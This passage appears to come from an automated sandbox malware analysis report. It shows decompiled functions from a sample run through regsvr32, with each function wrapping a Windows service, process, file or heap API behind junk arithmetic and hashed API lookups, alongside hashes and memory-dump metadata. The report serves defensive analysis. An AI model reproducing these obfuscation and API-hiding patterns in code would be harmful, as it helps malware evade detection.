				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E0025BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x0024f1e5
0x0024f1ea
0x0024f1f5
0x0024f1fa
0x0024f203
0x0024f20a
0x0024f20d
0x0024f210
0x0024f217
0x0024f21b
0x0024f21f
0x0024f226
0x0024f22d
0x0024f23a
0x0024f23e
0x0024f241
0x0024f245
0x0024f24c
0x0024f253
0x0024f25a
0x0024f25e
0x0024f265
0x0024f276
0x0024f279
0x0024f27d
0x0024f284
0x0024f2a3
0x0024f2b0
0x0024f2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0024F2B0

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: a877226131397506895fd54219aef13f030c6c6f83f02195375fd577f937b284
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: 982157B5D0121DAFDB08DFA5C88A8EEFBB4FB44708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002432B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E002432B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00249E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E0025BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x002432be
0x002432bf
0x002432c2
0x002432c3
0x002432c8
0x002432cd
0x002432d6
0x002432d9
0x002432dc
0x002432e9
0x002432ec
0x002432f4
0x002432f5
0x002432fa
0x00243304
0x0024330b
0x0024330f
0x00243316
0x0024331d
0x00243324
0x00243335
0x00243338
0x0024333c
0x00243343
0x0024334a
0x00243361
0x00243364
0x00243377
0x00243384
0x0024338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00243384

Strings

w\ y, xrefs: 0024331D

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 5db1df392e619ab0ca8f8379af9b047f70f2d5fa66a67b40791d7785cfe40661
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 3E2123B5D01228FBCB04DFA9D84A9EEBFB5FB40304F20818AE424A6250D3B55B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0024C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0024C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00249E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E0025BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x0024c4f2
0x0024c4f5
0x0024c4f7
0x0024c4fa
0x0024c4fd
0x0024c500
0x0024c501
0x0024c502
0x0024c507
0x0024c50e
0x0024c515
0x0024c51c
0x0024c523
0x0024c52a
0x0024c52d
0x0024c531
0x0024c538
0x0024c53f
0x0024c556
0x0024c55e
0x0024c562
0x0024c569
0x0024c570
0x0024c577
0x0024c57e
0x0024c585
0x0024c58c
0x0024c593
0x0024c59a
0x0024c5ad
0x0024c5bc
0x0024c5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0024C5BC

Strings

", xrefs: 0024C577

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: ebd3e2580e373648217ee390eafcd1881ad38cc7bbab6ddd9ee9c9b571e4881a
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: 842120B5C1020DEBCF15DFA4D8499EEBBB4FF04318F108588E92566260E3B29B18DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0025A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0025A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00249E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E0025BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x0025a994
0x0025a997
0x0025a99c
0x0025a9a1
0x0025a9a7
0x0025a9ae
0x0025a9b5
0x0025a9c2
0x0025a9c5
0x0025a9c8
0x0025a9cf
0x0025a9db
0x0025a9dc
0x0025a9e1
0x0025a9eb
0x0025a9f2
0x0025a9f9
0x0025aa00
0x0025aa17
0x0025aa1a
0x0025aa2b
0x0025aa2e
0x0025aa41
0x0025aa4c
0x0025aa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0025AA4C

Strings

ijp, xrefs: 0025A9EB

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: d59962d82d0bc804b241b919acdc0e0fea4ea12846a3c40075adf1198578197e
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: 1D2117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE404AB250D7B59B549F84

Uniqueness

Uniqueness Score: -1.00%

Function 0024338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0024338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00249E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E0025BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x00243391
0x00243396
0x0024339b
0x002433a1
0x002433a5
0x002433ac
0x002433b9
0x002433bd
0x002433c0
0x002433c7
0x002433d8
0x002433db
0x002433f2
0x002433f5
0x002433fc
0x00243403
0x0024340a
0x0024340e
0x00243415
0x0024341c
0x00243427
0x0024342a
0x00243431
0x00243444
0x0024344f
0x00243454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0024344F

Strings

|[0, xrefs: 002433FC

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: 6021d4202f0fb1941955efc50953139fc6504c1e0eb23f8995b524776a8c80d4
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: A12136B4D00209EFCF04DFA5C94AAEEBBB4FB00305F108189E424AA250D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 0025E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0025E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00249E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E0025BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x0025e37a
0x0025e37d
0x0025e37f
0x0025e382
0x0025e384
0x0025e389
0x0025e392
0x0025e399
0x0025e3a0
0x0025e3a7
0x0025e3ae
0x0025e3b5
0x0025e3bc
0x0025e3c3
0x0025e3cf
0x0025e3d5
0x0025e3d8
0x0025e3df
0x0025e3e6
0x0025e3ed
0x0025e3f4
0x0025e40b
0x0025e413
0x0025e426
0x0025e42f
0x0025e435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00253F2A,00000000), ref: 0025E42F

Strings

M8, xrefs: 0025E3ED

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: b884fbea8373168993e585d01c3280f8d57f9d922a41d9aae6ea45c778de6413
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: AC1159B5D10209EFDF58DFA4C84989EBBB4EB40324F108299E824B6290D3B55B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 002546E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E002546E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00249E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E0025BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x002546e8
0x002546ed
0x002546ef
0x002546f2
0x002546f5
0x002546f8
0x002546f9
0x002546fc
0x002546ff
0x00254702
0x00254703
0x00254706
0x00254709
0x0025470c
0x0025470d
0x00254710
0x00254713
0x00254716
0x00254717
0x00254719
0x0025471e
0x00254727
0x0025472e
0x00254732
0x00254739
0x00254740
0x00254747
0x0025474e
0x00254755
0x0025475c
0x00254763
0x0025476a
0x00254771
0x0025477d
0x00254783
0x00254786
0x0025478d
0x002547ae
0x002547ca
0x002547d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 002547CA

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: 62a364fea1333d2f52e3187ec1b22be7afb048d5acf796abbfff2be0d87b8762
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: F031F272900248FBDF559F95CD09CDEBF76FB89314F008188FA2462120D7B69A64EF60

Uniqueness

Uniqueness Score: -1.00%

Function 0025BF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0025BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00249E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E0025BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x0025bf24
0x0025bf29
0x0025bf2b
0x0025bf2e
0x0025bf2f
0x0025bf30
0x0025bf33
0x0025bf36
0x0025bf39
0x0025bf3c
0x0025bf3f
0x0025bf42
0x0025bf43
0x0025bf44
0x0025bf49
0x0025bf53
0x0025bf5a
0x0025bf61
0x0025bf68
0x0025bf6c
0x0025bf70
0x0025bf77
0x0025bf7e
0x0025bf85
0x0025bf9c
0x0025bfa4
0x0025bfab
0x0025bfb2
0x0025bfb6
0x0025bfba
0x0025bfbe
0x0025bfd1
0x0025bfe8
0x0025bfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0025BFE8

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: 4d03acb17c60b100f46402fdd6611646a97f31ee6a20c5738b09a3fa984e300d
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: 1F21057281020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00251B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00251B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00249E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E0025BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x00251b2a
0x00251b2d
0x00251b2f
0x00251b31
0x00251b34
0x00251b37
0x00251b3a
0x00251b3b
0x00251b3c
0x00251b41
0x00251b50
0x00251b54
0x00251b61
0x00251b64
0x00251b6b
0x00251b72
0x00251b79
0x00251b7d
0x00251b84
0x00251b8b
0x00251b92
0x00251b99
0x00251ba0
0x00251ba7
0x00251bae
0x00251bc2
0x00251bc5
0x00251bd8
0x00251be5
0x00251bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00251BE5

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: 2b0c4fff84bd28e1ce9be2348055e9bbbdb953ecdf2aaeb722f64a680f07c777
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: 032133B5D00208FBDF05DFA5C94A8EEBFB5FB80314F10808AE914A6261D3B59B51DF61

Uniqueness

Uniqueness Score: -1.00%

Function 002566C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002566C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00249E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E0025BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x002566cf
0x002566e4
0x002566e9
0x002566f3
0x002566f7
0x002566fe
0x00256705
0x0025670c
0x00256710
0x00256717
0x0025671e
0x00256725
0x00256729
0x0025672d
0x00256734
0x0025673b
0x00256742
0x00256766
0x00256777
0x0025677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00256777

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 3e6cdc64bd6801cee245b8d26d5555400a2134698aead9369260eccf58019048
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: DB1103B2900219BBCF159F95CC0A8DEBFB4EF95714F108198E92966211D3B18A65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0024FCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0024FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00249E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
